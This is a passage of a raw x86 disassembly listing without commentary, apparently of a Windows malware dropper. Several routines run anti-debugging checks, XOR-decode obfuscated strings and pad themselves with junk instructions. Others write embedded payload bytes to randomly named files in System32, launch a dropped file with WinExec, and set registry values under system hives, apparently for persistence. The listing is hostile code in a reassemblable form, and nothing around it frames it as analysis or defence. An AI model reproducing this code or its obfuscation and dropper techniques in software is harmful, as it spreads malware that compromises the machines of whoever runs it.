jg short loc_4034BF
loc_4034EE: ; CODE XREF: sub_403489+57�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_40352B
mov [ebp+var_4], 0
jmp short loc_403519
; ---------------------------------------------------------------------------
loc_403500: ; CODE XREF: sub_403489+A0�j
movzx eax, [ebp+var_4]
mov edx, [ebp+arg_4]
movzx ecx, [ebp+var_2]
mov esi, eax
add esi, ecx
mov cl, [ebx+esi]
mov [edx+eax], cl
inc [ebp+var_4]
loc_403519: ; CODE XREF: sub_403489+75�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_403500
loc_40352B: ; CODE XREF: sub_403489+6D�j
pop edi
pop esi
pop ebx
leave
retn
sub_403489 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403530 proc near ; CODE XREF: sub_403BBF+6D�p
; sub_403D2D+258�p ...
var_10D = byte ptr -10Dh
var_106 = word ptr -106h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push esi
push edi
call sub_40CA58 ; IsDebuggerPresent
mov ax, word_43D185
mov [ebp+var_106], ax
lea eax, [ebp+var_104]
push eax
push [ebp+arg_0]
call sub_403489
call sub_40CA58 ; IsDebuggerPresent
push 2
push offset word_4475CA
call sub_4033E1
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CE78
add esp, 18h
lea edi, [ebp+var_10D]
lea esi, aGbT ; "gb;|t^"
mov ecx, 7
rep movsb
lea eax, [ebp+var_104]
push eax
call sub_40CA04 ; GlobalAddAtomA
call sub_40C9D4 ; GetVersion
pop edi
pop esi
leave
retn
sub_403530 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035A5 proc near ; CODE XREF: sub_409A96+2BA�p
; sub_409A96+358�p ...
var_10F = word ptr -10Fh
var_10D = byte ptr -10Dh
var_10A = word ptr -10Ah
var_108 = word ptr -108h
var_105 = byte ptr -105h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push esi
push edi
call sub_40C9C8 ; GetTickCount
lea edi, [ebp+var_10D]
lea esi, aF ; "f'"
mov ecx, 3
rep movsb
mov ax, word_43D191
mov [ebp+var_10F], ax
lea eax, [ebp+var_105]
push eax
push [ebp+arg_0]
call sub_403489
call sub_40C944 ; GetCurrentThreadId
push 2
push offset word_4475CA
call sub_4033E1
push eax
lea edi, [ebp+var_105]
push edi
call sub_40CE78
add esp, 18h
mov [ebp+var_1], 75h
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
loc_403616: ; CODE XREF: sub_4035A5+C4�j
lea eax, [ebp+var_105]
push eax
call sub_40CA1C ; GlobalFindAtomA
mov edi, eax
mov [ebp+var_108], di
call sub_40C9C8 ; GetTickCount
cmp [ebp+var_108], 0
jz short loc_40366B
call sub_40C968 ; RtlGetLastWin32Error
movzx eax, [ebp+var_108]
push eax
call sub_40CA10 ; GlobalDeleteAtom
mov [ebp+var_10A], 7F4Eh
movzx eax, [ebp+var_10A]
imul eax, 62EDh
mov [ebp+var_10A], ax
jmp short loc_403616
; ---------------------------------------------------------------------------
loc_40366B: ; CODE XREF: sub_4035A5+93�j
pop edi
pop esi
leave
retn
sub_4035A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40366F proc near ; CODE XREF: sub_4036F8+AC�p
; sub_4037FA+24�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43D19C
lea eax, ds:40E170h[eax]
push eax
call sub_40CE18
add esp, 0Ch
mov [ebp+var_4], 4Ch
xor edi, edi
jmp short loc_4036B4
; ---------------------------------------------------------------------------
loc_40369D: ; CODE XREF: sub_40366F+47�j
mov eax, dword_43D19C
add eax, edi
lea eax, ds:40E170h[eax]
movsx edx, byte ptr [eax]
xor edx, 32h
mov [eax], dl
inc edi
loc_4036B4: ; CODE XREF: sub_40366F+2C�j
cmp edi, esi
jl short loc_40369D
mov [ebp+var_8], 130h
mov eax, dword_43D19C
add eax, esi
mov byte ptr ds:dword_40E170[eax], 0
mov edi, dword_43D19C
mov eax, edi
add eax, 3
add eax, esi
mov dword_43D19C, eax
cmp eax, 0DE7h
jle short loc_4036EE
and dword_43D19C, 0
loc_4036EE: ; CODE XREF: sub_40366F+76�j
lea eax, dword_40E170[edi]
pop edi
pop esi
leave
retn
sub_40366F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036F8 proc near ; CODE XREF: sub_4037FA+31�p
var_49 = byte ptr -49h
var_44 = byte ptr -44h
var_3C = dword ptr -3Ch
var_37 = byte ptr -37h
var_36 = byte ptr -36h
var_35 = byte ptr -35h
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
call sub_40C998 ; GetProcessHeap
lea edi, [ebp+var_44]
lea esi, aAcz?lh ; "ACZ?lH$"
movsd
movsd
mov [ebp+var_37], 0E4h
movzx eax, [ebp+var_37]
imul eax, 61BBh
mov [ebp+var_37], al
mov eax, 11h
sub eax, dword_43D198
push eax
lea eax, [ebp+var_35]
push eax
push [ebp+arg_0]
call sub_40CDC4
add esp, 0Ch
call sub_40C998 ; GetProcessHeap
lea ecx, [ebp+var_35]
or eax, 0FFFFFFFFh
loc_40374B: ; CODE XREF: sub_4036F8+58�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40374B
mov edx, eax
mov [ebp+var_2], dl
lea edi, [ebp+var_49]
lea esi, aIT ; "$i'T"
mov ecx, 5
rep movsb
mov [ebp+var_1], 0
jmp short loc_403783
; ---------------------------------------------------------------------------
loc_40376D: ; CODE XREF: sub_4036F8+95�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
sub edx, eax
dec edx
mov al, [ebp+eax+var_35]
mov [ebx+edx], al
add [ebp+var_1], 1
loc_403783: ; CODE XREF: sub_4036F8+73�j
movzx eax, [ebp+var_1]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_40376D
movzx eax, [ebp+var_2]
mov byte ptr [ebx+eax], 0
mov [ebp+var_3], 0
jmp short loc_4037B7
; ---------------------------------------------------------------------------
loc_40379D: ; CODE XREF: sub_4036F8+D0�j
push 1
push offset byte_4475C8
call sub_40366F
push eax
push ebx
call sub_40CE78
add esp, 10h
add [ebp+var_3], 1
loc_4037B7: ; CODE XREF: sub_4036F8+A3�j
movzx eax, [ebp+var_3]
mov edx, 20h
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jl short loc_40379D
mov [ebp+var_36], 0Ah
movzx eax, [ebp+var_36]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_36], al
push [ebp+arg_8]
push ebx
call sub_40CE78
add esp, 8
mov [ebp+var_3C], 5EB3h
sub [ebp+var_3C], 53C4h
pop edi
pop esi
pop ebx
leave
retn
sub_4036F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4037FA proc near ; CODE XREF: sub_40AB84+643�p
var_3C = byte ptr -3Ch
var_34 = word ptr -34h
var_32 = byte ptr -32h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3Ch
push esi
push edi
mov ax, word_43D1AD
mov [ebp+var_34], ax
lea edi, [ebp+var_3C]
lea esi, aBZ ; "b ~z: "
movsd
movsd
push 1
push offset word_4475C6
call sub_40366F
push eax
lea edi, [ebp+var_32]
push edi
push [ebp+arg_0]
call sub_4036F8
add esp, 14h
lea eax, [ebp+var_32]
push eax
call sub_40CA04 ; GlobalAddAtomA
call sub_40C9C8 ; GetTickCount
pop edi
pop esi
leave
retn
sub_4037FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403845 proc near ; CODE XREF: sub_4038DA+4F�p
; .text:004039B3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43D1C0
lea eax, ds:40F770h[eax]
push eax
call sub_40CE18
add esp, 0Ch
mov [ebp+var_4], 37Bh
xor edi, edi
jmp short loc_40388A
; ---------------------------------------------------------------------------
loc_403873: ; CODE XREF: sub_403845+47�j
mov eax, dword_43D1C0
add eax, edi
lea eax, ds:40F770h[eax]
movsx edx, byte ptr [eax]
xor edx, 26h
mov [eax], dl
inc edi
loc_40388A: ; CODE XREF: sub_403845+2C�j
cmp edi, esi
jl short loc_403873
mov eax, dword_43D1C0
add eax, esi
mov byte ptr ds:dword_40F770[eax], 0
mov edi, dword_43D1C0
mov eax, edi
add eax, 3
add eax, esi
mov dword_43D1C0, eax
add dword_43D1C0, 2
cmp dword_43D1C0, 0DB3h
jle short loc_4038C9
and dword_43D1C0, 0
loc_4038C9: ; CODE XREF: sub_403845+7B�j
mov [ebp+var_8], 0A9h
lea eax, dword_40F770[edi]
pop edi
pop esi
leave
retn
sub_403845 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4038DA proc near ; CODE XREF: sub_40AB84+6D3�p
; sub_40AB84+6EC�p
var_10F = word ptr -10Fh
var_10D = byte ptr -10Dh
var_105 = byte ptr -105h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 110h
push esi
push edi
call sub_40C998 ; GetProcessHeap
lea edi, [ebp+var_10D]
lea esi, aAtdG ; "AtD> G#"
movsd
movsd
mov [ebp+var_105], 0B9h
sub [ebp+var_105], 13h
push [ebp+arg_0]
lea eax, [ebp+var_104]
push eax
call sub_40CE54
mov ax, word_43D1CC
mov [ebp+var_10F], ax
push 1
push offset byte_4475C4
call sub_403845
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CE78
push [ebp+arg_4]
lea eax, [ebp+var_104]
push eax
call sub_40CE78
add esp, 20h
call sub_40C944 ; GetCurrentThreadId
lea eax, [ebp+var_104]
push eax
call sub_40CA04 ; GlobalAddAtomA
call sub_40C944 ; GetCurrentThreadId
pop edi
pop esi
leave
retn
sub_4038DA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 118h
push esi
push edi
call sub_40CA58 ; IsDebuggerPresent
lea edi, [ebp-10Fh]
lea esi, aYr1 ; "yR1 "
mov ecx, 5
rep movsb
lea edi, [ebp-114h]
lea esi, aB ; " ~$"
mov ecx, 5
rep movsb
push dword ptr [ebp+8]
lea eax, [ebp-104h]
push eax
call sub_40CE54
push 1
push offset byte_4475C4
call sub_403845
push eax
lea edi, [ebp-104h]
push edi
call sub_40CE78
call sub_40C9C8 ; GetTickCount
push dword ptr [ebp+0Ch]
lea eax, [ebp-104h]
push eax
call sub_40CE78
add esp, 20h
call sub_40C938 ; GetCurrentProcessId
loc_4039E1: ; CODE XREF: .text:00403A4F�j
lea eax, [ebp-104h]
push eax
call sub_40CA1C ; GlobalFindAtomA
mov edi, eax
mov [ebp-10Ah], di
mov word ptr [ebp-106h], 698Eh
movzx eax, word ptr [ebp-106h]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-106h], ax
cmp word ptr [ebp-10Ah], 0
jz short loc_403A51
mov byte ptr [ebp-107h], 84h
movzx eax, byte ptr [ebp-107h]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp-107h], al
movzx eax, word ptr [ebp-10Ah]
push eax
call sub_40CA10 ; GlobalDeleteAtom
mov eax, dword_43D1D8
mov [ebp-118h], eax
jmp short loc_4039E1
; ---------------------------------------------------------------------------
loc_403A51: ; CODE XREF: .text:00403A1B�j
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403A55 proc near ; CODE XREF: sub_403AED+78�p
; sub_403BBF+43�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_43D1E4
lea eax, ds:41EAC0h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_403A92
; ---------------------------------------------------------------------------
loc_403A7B: ; CODE XREF: sub_403A55+3F�j
mov eax, dword_43D1E4
add eax, edi
lea eax, ds:41EAC0h[eax]
movsx edx, byte ptr [eax]
xor edx, 74h
mov [eax], dl
inc edi
loc_403A92: ; CODE XREF: sub_403A55+24�j
cmp edi, esi
jl short loc_403A7B
mov eax, dword_43D1E4
add eax, esi
mov byte ptr ds:dword_41EAC0[eax], 0
xor edi, edi
mov edi, dword_43D1E4
add dword_43D1E4, 3
mov eax, dword_43D1E4
lea eax, [eax+esi+4]
mov dword_43D1E4, eax
add dword_43D1E4, 2
cmp dword_43D1E4, 0DC3h
jle short loc_403ADC
and dword_43D1E4, 0
loc_403ADC: ; CODE XREF: sub_403A55+7E�j
mov [ebp+var_4], 0ACh
lea eax, dword_41EAC0[edi]
pop edi
pop esi
leave
retn
sub_403A55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AED proc near ; CODE XREF: sub_403BBF+29�p
; sub_403D2D+142�p ...
var_100C = dword ptr -100Ch
var_1006 = word ptr -1006h
var_1004 = byte ptr -1004h
var_1003 = byte ptr -1003h
var_1000 = byte ptr -1000h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_40C8BC
push edi
mov edi, [ebp+arg_0]
call sub_40C9D4 ; GetVersion
mov [ebp+var_1006], 68A3h
inc [ebp+var_1006]
push 0FFFh
lea eax, [ebp+var_1003]
push eax
call sub_40C9A4 ; GetSystemDirectoryA
mov [ebp+var_1000], 0
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_100C]
push eax
push 0FFFh
lea eax, [ebp+var_1003]
push eax
lea eax, [ebp+var_1003]
push eax
call sub_40C9EC ; GetVolumeInformationA
push 4
push offset aQdl ; "QDL,"
call sub_403A55
push [ebp+var_100C]
push eax
push edi
call sub_40CE54
add esp, 14h
call sub_40C9C8 ; GetTickCount
and [ebp+var_4], 0
loc_403B83: ; CODE XREF: sub_403AED+B3�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 41h
jge short loc_403B99
cmp al, 30h
jle short loc_403B99
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 11h
loc_403B99: ; CODE XREF: sub_403AED+9E�j
; sub_403AED+A2�j
inc [ebp+var_4]
cmp [ebp+var_4], 8
jb short loc_403B83
mov [ebp+var_1004], 19h
movzx eax, [ebp+var_1004]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1004], al
pop edi
leave
retn
sub_403AED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BBF proc near ; CODE XREF: sub_40AB84+77D�p
var_290 = byte ptr -290h
var_288 = byte ptr -288h
var_283 = dword ptr -283h
var_27F = byte ptr -27Fh
var_277 = byte ptr -277h
var_274 = byte ptr -274h
var_270 = byte ptr -270h
var_268 = byte ptr -268h
var_267 = byte ptr -267h
var_163 = byte ptr -163h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 290h
push ebx
push esi
push edi
call sub_40C998 ; GetProcessHeap
lea edi, [ebp+var_268]
lea esi, byte_44220A
xor ecx, ecx
inc ecx
rep movsb
lea eax, [ebp+var_163]
push eax
call sub_403AED
lea edi, [ebp+var_270]
lea esi, aD?dK ; "D-?d# K"
movsd
movsd
push 9
push offset byte_4475B5
call sub_403A55
lea edi, [ebp+var_163]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CE54
call sub_40CA58 ; IsDebuggerPresent
lea eax, [ebp+var_FF]
push eax
call sub_403530
call sub_40C998 ; GetProcessHeap
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_FF]
push eax
call sub_40CAD0 ; CreateFileA
mov ebx, eax
call sub_40C9D4 ; GetVersion
push 0
lea eax, [ebp+var_274]
push eax
push 3621h
push offset byte_43EBE9
push ebx
call sub_40CB48 ; WriteFile
lea edi, [ebp+var_277]
lea esi, aY ; "*y"
mov ecx, 3
rep movsb
push ebx
call sub_40C9B0 ; CloseHandle
lea edi, [ebp+var_27F]
lea esi, aCl6gK ; "Cl6g&k&"
mov ecx, 2
rep movsd
mov eax, dword_44221E
mov [ebp+var_283], eax
push 104h
lea eax, [ebp+var_267]
push eax
push 0
call sub_40C974 ; GetModuleFileNameA
lea edi, [ebp+var_288]
lea esi, a89vb ; "89"
mov ecx, 5
rep movsb
push 1
push offset byte_4475B3
call sub_403A55
push eax
lea edi, [ebp+var_FF]
push edi
call sub_40CE78
lea edi, [ebp+var_290]
lea esi, aCkrW@g ; "ckR%W@g"
mov ecx, 2
rep movsd
lea eax, [ebp+var_267]
push eax
lea eax, [ebp+var_FF]
push eax
call sub_40CE78
add esp, 38h
call sub_40C9C8 ; GetTickCount
push 0
lea eax, [ebp+var_FF]
push eax
call sub_40CB3C ; WinExec
call sub_40C944 ; GetCurrentThreadId
pop edi
pop esi
pop ebx
leave
retn
sub_403BBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403D2D proc near ; CODE XREF: sub_40AB84+30C�p
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2E7 = byte ptr -2E7h
var_2E4 = byte ptr -2E4h
var_2E0 = byte ptr -2E0h
var_2DD = byte ptr -2DDh
var_2D8 = byte ptr -2D8h
var_2D7 = word ptr -2D7h
var_2D5 = byte ptr -2D5h
var_2D2 = byte ptr -2D2h
var_26E = word ptr -26Eh
var_26C = word ptr -26Ch
var_26A = byte ptr -26Ah
var_269 = byte ptr -269h
var_205 = byte ptr -205h
var_101 = byte ptr -101h
var_FB = byte ptr -0FBh
var_FA = byte ptr -0FAh
var_F9 = byte ptr -0F9h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 314h
push ebx
push esi
push edi
call sub_40C9D4 ; GetVersion
lea edi, [ebp+var_2D5]
lea esi, aU3 ; "U3"
mov ecx, 3
rep movsb
call sub_40C968 ; RtlGetLastWin32Error
push 26h
push offset dword_44758C
call sub_403A55
mov [ebp+var_2F4], eax
call sub_40CE3C
mov [ebp+var_2F8], eax
call sub_40CE3C
mov [ebp+var_2FC], eax
call sub_40CE3C
mov [ebp+var_300], eax
call sub_40CE3C
mov [ebp+var_304], eax
call sub_40CE3C
mov [ebp+var_308], eax
call sub_40CE3C
mov [ebp+var_30C], eax
call sub_40CE3C
mov [ebp+var_310], eax
call sub_40CE3C
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_310]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_30C]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_308]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_304]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_300]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2FC]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2F8]
mov eax, edi
mov ecx, 0FFFFh
cdq
idiv ecx
push edx
mov edi, [ebp+var_2F4]
push edi
lea edi, [ebp+var_269]
push edi
call sub_40CE54
mov [ebp+var_26A], 39h
add [ebp+var_26A], 1
mov ax, word_442232
mov [ebp+var_2D7], ax
lea eax, [ebp+var_2D2]
push eax
call sub_403AED
add esp, 34h
mov [ebp+var_26C], 12D3h
add [ebp+var_26C], 67C1h
lea edi, [ebp+var_2D8]
lea esi, byte_442234
xor ecx, ecx
inc ecx
rep movsb
lea edi, [ebp+var_2DD]
lea esi, aPg ; " pG!"
mov ecx, 5
rep movsb
call sub_40CE3C
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov edi, eax
add edi, 41h
mov edx, edi
mov [ebp+var_101], dl
call sub_40C968 ; RtlGetLastWin32Error
mov [ebp+var_1], 1
jmp short loc_403F0F
; ---------------------------------------------------------------------------
loc_403EDF: ; CODE XREF: sub_403D2D+1E7�j
call sub_40CE3C
movzx edi, [ebp+var_1]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
mov esi, eax
add esi, 61h
mov edx, esi
mov [ebp+edi+var_101], dl
add [ebp+var_1], 1
loc_403F0F: ; CODE XREF: sub_403D2D+1B0�j
mov al, [ebp+var_1]
cmp al, 8
jbe short loc_403EDF
lea edi, [ebp+var_2E0]
lea esi, aP ; "p "
mov ecx, 3
rep movsb
mov [ebp+var_F9], 0
call sub_40CE3C
mov edx, eax
test dl, 1
jnz short loc_403F54
call sub_40C9C8 ; GetTickCount
mov [ebp+var_FB], 33h
call sub_40C998 ; GetProcessHeap
mov [ebp+var_FA], 32h
loc_403F54: ; CODE XREF: sub_403D2D+20D�j
push 9
push offset word_447582
call sub_403A55
lea edi, [ebp+var_101]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\System32"
push eax
lea edi, [ebp+var_205]
push edi
call sub_40CE54
call sub_40C9C8 ; GetTickCount
lea eax, [ebp+var_205]
push eax
call sub_403530
call sub_40C938 ; GetCurrentProcessId
push 0
push 0
push 2
push 0
push 0
push 40000000h
lea eax, [ebp+var_205]
push eax
call sub_40CAD0 ; CreateFileA
mov ebx, eax
call sub_40C9D4 ; GetVersion
push [ebp+arg_0]
mov eax, offset aPnpijd32 ; "Pnpijd32"
push eax
call sub_40CE54
call sub_40CA58 ; IsDebuggerPresent
push 0
lea eax, [ebp+var_2E4]
push eax
push 1A01h
push offset dword_43D1E8
push ebx
call sub_40CB48 ; WriteFile
lea edi, [ebp+var_2E7]
lea esi, aQ ; "q "
mov ecx, 3
rep movsb
push ebx
call sub_40C9B0 ; CloseHandle
mov [ebp+var_26E], 4BE6h
sub [ebp+var_26E], 1F66h
push 17h
push offset word_44756A
call sub_403A55 ; DATA XREF: .data:0043F179�w
; .data:0043F193�w ...
loc_404014: ; DATA XREF: .data:0043F262�w
lea edi, [ebp+var_269]
push edi
push eax
sub_403D2D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40401C proc near ; DATA XREF: .data:0043F20D�o
; .data:0043F25C�r
lea edi, [ebp-101h]
push edi
call sub_40CE54 ; DATA XREF: .data:0043F256�r
sub_40401C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404028 proc near ; DATA XREF: .data:0043F23C�o
; .data:0043F250�r ...
lea eax, [ebp-205h]
push eax
push offset byte_447569 ; DATA XREF: .data:0043F0E5�w
loc_404034: ; DATA XREF: .data:0043F0EF�w
; .data:0043F10A�r ...
lea eax, [ebp-101h]
push eax
push 80000000h ; DATA XREF: .data:0043F104�o
; .data:0043F112�o
call sub_4040C4
call sub_40C968 ; RtlGetLastWin32Error
push 0Eh
push offset word_44755A
call sub_403A55
mov [ebp-314h], eax
push 9
push offset dword_447550
call sub_403A55
push eax
mov edi, [ebp-314h]
push edi
lea edi, [ebp-101h]
push edi
push 80000000h
call sub_4040C4
push 45h
push offset word_44750A
call sub_403A55 ; DATA XREF: .data:0043F094�w
lea edi, [ebp-269h] ; DATA XREF: .data:0043F099�w
; .data:0043F0B5�w
push edi
loc_404094: ; DATA XREF: .data:0043F5F4�w
; .data:0043F5FA�r ...
lea edi, [ebp-2D2h]
push edi
push eax
sub_404028 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40409C proc near ; DATA XREF: .data:0043F51E�o
push 80000002h
call sub_4040C4
add esp, 80h ; DATA XREF: sub_43F670+C�o
lea edi, [ebp-2EEh]
lea esi, aNnNX ; "nN#n=X"
mov ecx, 7 ; DATA XREF: sub_43F670+1C�o
rep movsb
sub_40409C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4040BF proc near ; DATA XREF: .data:0043FE38�o
pop edi
pop esi
pop ebx
leave
retn
sub_4040BF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4040C4 proc near ; CODE XREF: sub_404028+18�p
; sub_404028+54�p ...
var_19 = word ptr -19h
var_17 = dword ptr -17h
var_13 = byte ptr -13h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_C]
lea edi, [ebp+var_13]
lea esi, aFB ; "$f'"
mov ecx, 5
rep movsb
inc dword_43C23C
mov eax, dword_44224C
mov [ebp+var_17], eax
mov ax, word_442250
mov [ebp+var_19], ax
and [ebp+var_4], 0
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push 0
push 0F003Fh
push 0
push 0
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40CD40 ; RegCreateKeyExA
mov [ebp+var_E], 631Fh
inc [ebp+var_E]
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_40412B: ; CODE XREF: sub_4040C4+6C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40412B
mov [ebp+var_C], eax
call sub_40C998 ; GetProcessHeap
push [ebp+var_C]
push ebx
push 1
push 0
push [ebp+arg_8]
push [ebp+var_4]
call sub_40CD70 ; RegSetValueExA
call sub_40CA58 ; IsDebuggerPresent
push [ebp+var_4]
call sub_40CD4C ; RegCloseKey
mov [ebp+var_5], 0Ah
movzx eax, [ebp+var_5]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5], al
pop edi
pop esi
pop ebx
leave
retn
sub_4040C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404170 proc near ; CODE XREF: sub_4041FC+C9�p
; sub_4041FC+E9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_44225C
lea eax, ds:411D10h[eax]
push eax
call sub_40CE18
add esp, 0Ch
xor edi, edi
jmp short loc_4041B0
; ---------------------------------------------------------------------------
loc_404196: ; CODE XREF: sub_404170+42�j
mov eax, dword_44225C
add eax, edi
lea eax, ds:411D10h[eax]
movsx edx, byte ptr [eax]
xor edx, 94h
mov [eax], dl
inc edi
loc_4041B0: ; CODE XREF: sub_404170+24�j
cmp edi, esi
jl short loc_404196
mov eax, dword_44225C
add eax, esi
mov byte ptr ds:dword_411D10[eax], 0
mov edi, dword_44225C
inc dword_44225C
mov eax, dword_44225C
lea eax, [eax+esi+3]
mov dword_44225C, eax
cmp eax, 0DDEh
jle short loc_4041EB
and dword_44225C, 0
loc_4041EB: ; CODE XREF: sub_404170+72�j
mov [ebp+var_4], 121h
lea eax, dword_411D10[edi]
pop edi
pop esi
leave
retn
sub_404170 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041FC proc near ; CODE XREF: sub_40AB84+34A�p
var_14BC = dword ptr -14BCh
var_14B8 = dword ptr -14B8h
var_14B3 = byte ptr -14B3h
var_14AC = byte ptr -14ACh
var_14A5 = byte ptr -14A5h
var_14A2 = word ptr -14A2h
var_14A0 = byte ptr -14A0h
var_149D = byte ptr -149Dh
var_149C = byte ptr -149Ch
var_1497 = byte ptr -1497h
var_1398 = word ptr -1398h
var_1396 = word ptr -1396h
var_1394 = dword ptr -1394h
var_1390 = dword ptr -1390h
var_1380 = dword ptr -1380h
var_12FC = byte ptr -12FCh
var_11FD = byte ptr -11FDh
var_10FE = byte ptr -10FEh
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
mov eax, 14BCh
call sub_40C8BC
push ebx
push esi
push edi
mov ebx, 7E95h
add ebx, 79CBh
lea edi, [ebp+var_149C]
lea esi, aXk ; "xk|#"
mov ecx, 5
rep movsb
call sub_40CA58 ; IsDebuggerPresent
push 0FFh
lea eax, [ebp+var_12FC]
push eax
push 0
call sub_40C974 ; GetModuleFileNameA
mov [ebp+var_1390], 94h
call sub_40C9D4 ; GetVersion
lea eax, [ebp+var_1390]
push eax
call sub_40C9E0 ; GetVersionExA
lea edi, [ebp+var_149D]
lea esi, byte_442265
xor ecx, ecx
inc ecx
rep movsb
lea edi, [ebp+var_14A0]
lea esi, aI ; "%i"
mov ecx, 3
rep movsb
cmp [ebp+var_1380], 2
jnz loc_40431F
call sub_40C938 ; GetCurrentProcessId
push 0FFh
